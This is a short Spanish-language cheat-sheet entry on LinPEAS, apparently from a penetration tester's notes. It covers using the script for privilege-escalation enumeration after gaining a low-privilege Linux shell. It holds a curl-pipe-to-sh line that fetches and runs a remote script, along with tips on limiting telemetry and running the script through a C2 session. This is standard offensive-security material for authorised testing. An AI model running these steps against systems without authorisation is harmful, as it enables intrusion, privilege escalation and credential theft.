LinPEAS
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Script todo-en-uno de enumeración local: recorre el host Linux buscando vectores de escalada (SUID, sudo, capabilities, cron, credenciales en claro, configuraciones expuestas) y colorea cada hallazgo según su relevancia.
Cuando aterrizas en un host Linux con una shell de usuario sin privilegios y quieres un mapa rápido de todo lo que merece la pena probar. Lo ejecuto casi siempre al principio de la post-explotación: tarda un par de minutos y me dice por dónde tirar, desde binarios SUID hasta variables de entorno con secretos.
Si la operación es delicada, el escaneo completo toca muchos archivos y genera bastante telemetría; mejor usar -s para limitarse a una sección. También evítalo si no puedes sacar el script al host (egress filtrado): entonces portátalo dentro de tu sesión C2 o sube solo las partes que te interesan.